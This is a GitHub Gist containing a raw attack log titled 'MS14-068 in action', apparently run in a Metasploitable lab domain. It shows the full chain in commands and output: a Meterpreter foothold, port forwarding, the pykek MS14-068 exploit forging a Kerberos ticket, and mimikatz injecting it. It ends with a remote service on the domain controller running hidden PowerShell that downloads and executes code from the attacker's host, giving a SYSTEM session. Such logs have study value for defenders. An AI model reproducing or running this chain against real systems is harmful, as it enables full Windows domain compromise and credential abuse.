Created
December 6, 2014 00:05
-
-
Save jstnkndy/a2f5326a0e5d4cb412a5 to your computer and use it in GitHub Desktop.
MS14-068 in action
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
git clone https://github.com/bidord/pykek | |
echo 127.0.0.1 msfdc01.metasploitable.local >> /etc/hosts | |
[*] [2014.12.05-23:43:51] 172.16.80.100 web_delivery - Delivering Payload | |
[*] [2014.12.05-23:43:53] Sending stage (770048 bytes) to 172.16.80.100 | |
[*] Meterpreter session 12 opened (172.16.80.225:4444 -> 172.16.80.100:57204) at 2014-12-05 23:44:12 +0000 | |
20141205-23:44 - 192.168.153.129 exploit(payload_inject) > sessions -i 12 | |
[*] Starting interaction with 12... | |
meterpreter > portfwd add -l 88 -p 88 -r 172.16.80.10 | |
[*] Local TCP relay created: 0.0.0.0:88 <-> 172.16.80.10:88 | |
python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066-1105 | |
[+] Building AS-REQ for msfdc01.metasploitable.local... Done! | |
[+] Sending AS-REQ to msfdc01.metasploitable.local... Done! | |
[+] Receiving AS-REP from msfdc01.metasploitable.local... Done! | |
[+] Parsing AS-REP from msfdc01.metasploitable.local... Done! | |
[+] Building TGS-REQ for msfdc01.metasploitable.local... Done! | |
[+] Sending TGS-REQ to msfdc01.metasploitable.local... Done! | |
[+] Receiving TGS-REP from msfdc01.metasploitable.local... Done! | |
[+] Parsing TGS-REP from msfdc01.metasploitable.local... Done! | |
[+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done! | |
meterpreter > getuid | |
Server username: METASPLOITABLE\User01 | |
meterpreter > sysinfo | |
Computer : MSFTS01 | |
OS : Windows 8.1 (Build 9600). | |
Architecture : x64 (Current Process is WOW64) | |
System Language : en_GB | |
Meterpreter : x86/win32 | |
meterpreter > shell | |
Process 4232 created. | |
Channel 1 created. | |
Microsoft Windows [Version 6.3.9600] | |
(c) 2013 Microsoft Corporation. All rights reserved. | |
C:\Windows\system32\WindowsPowerShell\v1.0>whoami /user | |
whoami /user | |
USER INFORMATION | |
---------------- | |
User Name SID | |
===================== ============================================== | |
metasploitable\user01 S-1-5-21-2928836948-3642677517-2073454066-1105 | |
C:\Windows\system32\WindowsPowerShell\v1.0>net use \\msfdc01\admin$ | |
net use \\msfdc01\admin$ | |
The password is invalid for \\msfdc01\admin$. | |
Enter the username for 'msfdc01': System error 1223 has occurred. | |
The operation was cancelled by the user. | |
c:\test>exit | |
meterpreter > cd c:/test | |
meterpreter > upload /root/TGT_user01@metasploitable.local.ccache c:/test/TGT_user01@metasploitable.local.ccache | |
[*] uploading : /root/TGT_user01@metasploitable.local.ccache -> c:/test/TGT_user01@metasploitable.local.ccache | |
[*] uploaded : /root/TGT_user01@metasploitable.local.ccache -> c:/test/TGT_user01@metasploitable.local.ccache | |
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"kerberos::ptc TGT_user01@metasploitable.local.ccache" exit' | |
Process 3600 created. | |
Channel 3 created. | |
meterpreter > shell | |
Process 3948 created. | |
Channel 4 created. | |
Microsoft Windows [Version 6.3.9600] | |
(c) 2013 Microsoft Corporation. All rights reserved. | |
c:\test>net use \\msfdc01\admin$ | |
net use \\msfdc01\admin$ | |
The password is invalid for \\msfdc01\admin$. | |
Enter the username for 'msfdc01': System error 1223 has occurred. | |
The operation was cancelled by the user. | |
c:\test>klist | |
klist | |
'klist' is not recognized as an internal or external command, | |
operable program or batch file. | |
c:\test>mimikatz "kerberos::ptc TGT_user01@metasploitable.local.ccache" exit | |
mimikatz "kerberos::ptc TGT_user01@metasploitable.local.ccache" exit | |
.#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 20 2014 01:35:45) | |
.## ^ ##. | |
## / \ ## /* * * | |
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) | |
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) | |
'#####' with 15 modules * * */ | |
mimikatz(commandline) # kerberos::ptc TGT_user01@metasploitable.local.ccache | |
Principal : (01) : user01 ; @ METASPLOITABLE.LOCAL | |
Data 0 | |
Start/End/MaxRenew: 05/12/2014 23:42:03 ; 06/12/2014 09:41:58 ; 12/12/2014 23:41:58 | |
Service Name (01) : krbtgt ; METASPLOITABLE.LOCAL ; @ METASPLOITABLE.LOCAL | |
Target Name (01) : krbtgt ; METASPLOITABLE.LOCAL ; @ METASPLOITABLE.LOCAL | |
Client Name (01) : user01 ; @ METASPLOITABLE.LOCAL | |
Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ; | |
Session Key : 0x00000017 - rc4_hmac_nt | |
d5c7022a905e9c71deed80c28940a27d | |
Ticket : 0x00000000 - null ; kvno = 2 [...] | |
* Injecting ticket : OK | |
mimikatz(commandline) # exit | |
Bye! | |
c:\test>net use \\msfdc01\admin$ | |
net use \\msfdc01\admin$ | |
The command completed successfully. | |
c:\test>sc \\msfdc01\ create test binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('ht^C | |
Terminate channel 4? [y/N] n | |
c:\test> | |
c:\test>sc \\msfdc01\ create test_ptc binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.80.225:8080/'))" | |
sc \\msfdc01\ create test_ptc binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.80.225:8080/'))" | |
[SC] CreateService SUCCESS | |
c:\test>sc \\msfdc01\ start test_ptc | |
sc \\msfdc01\ start test_ptc | |
^Z | |
Background channel 4? [y/N] y | |
meterpreter > | |
meterpreter > background | |
[*] Backgrounding session 12... | |
20141205-23:49 - 192.168.153.129 exploit(payload_inject) > sessions | |
Active sessions | |
=============== | |
Id Type Information Connection | |
-- ---- ----------- ---------- | |
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ MSFDC01 172.16.80.225:4444 -> 172.16.80.10:60843 (172.16.80.10) | |
12 meterpreter x86/win32 METASPLOITABLE\User01 @ MSFTS01 172.16.80.225:4444 -> 172.16.80.100:57204 (172.16.80.100) | |
20141205-23:49 - 192.168.153.129 exploit(payload_inject) > | |
[*] [2014.12.05-23:49:18] 172.16.80.10 web_delivery - Delivering Payload | |
[*] [2014.12.05-23:49:19] Sending stage (770048 bytes) to 172.16.80.10 | |
[*] Meterpreter session 13 opened (172.16.80.225:4444 -> 172.16.80.10:60961) at 2014-12-05 23:49:35 +0000 | |
20141205-23:50 - 192.168.153.129 exploit(payload_inject) > sessions -i 13 | |
[*] Starting interaction with 13... | |
meterpreter > getuid | |
Server username: NT AUTHORITY\SYSTEM | |
meterpreter > sysinfo | |
Computer : MSFDC01 | |
OS : Windows 2008 (Build 6002, Service Pack 2). | |
Architecture : x86 | |
System Language : en_GB | |
Meterpreter : x86/win32 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment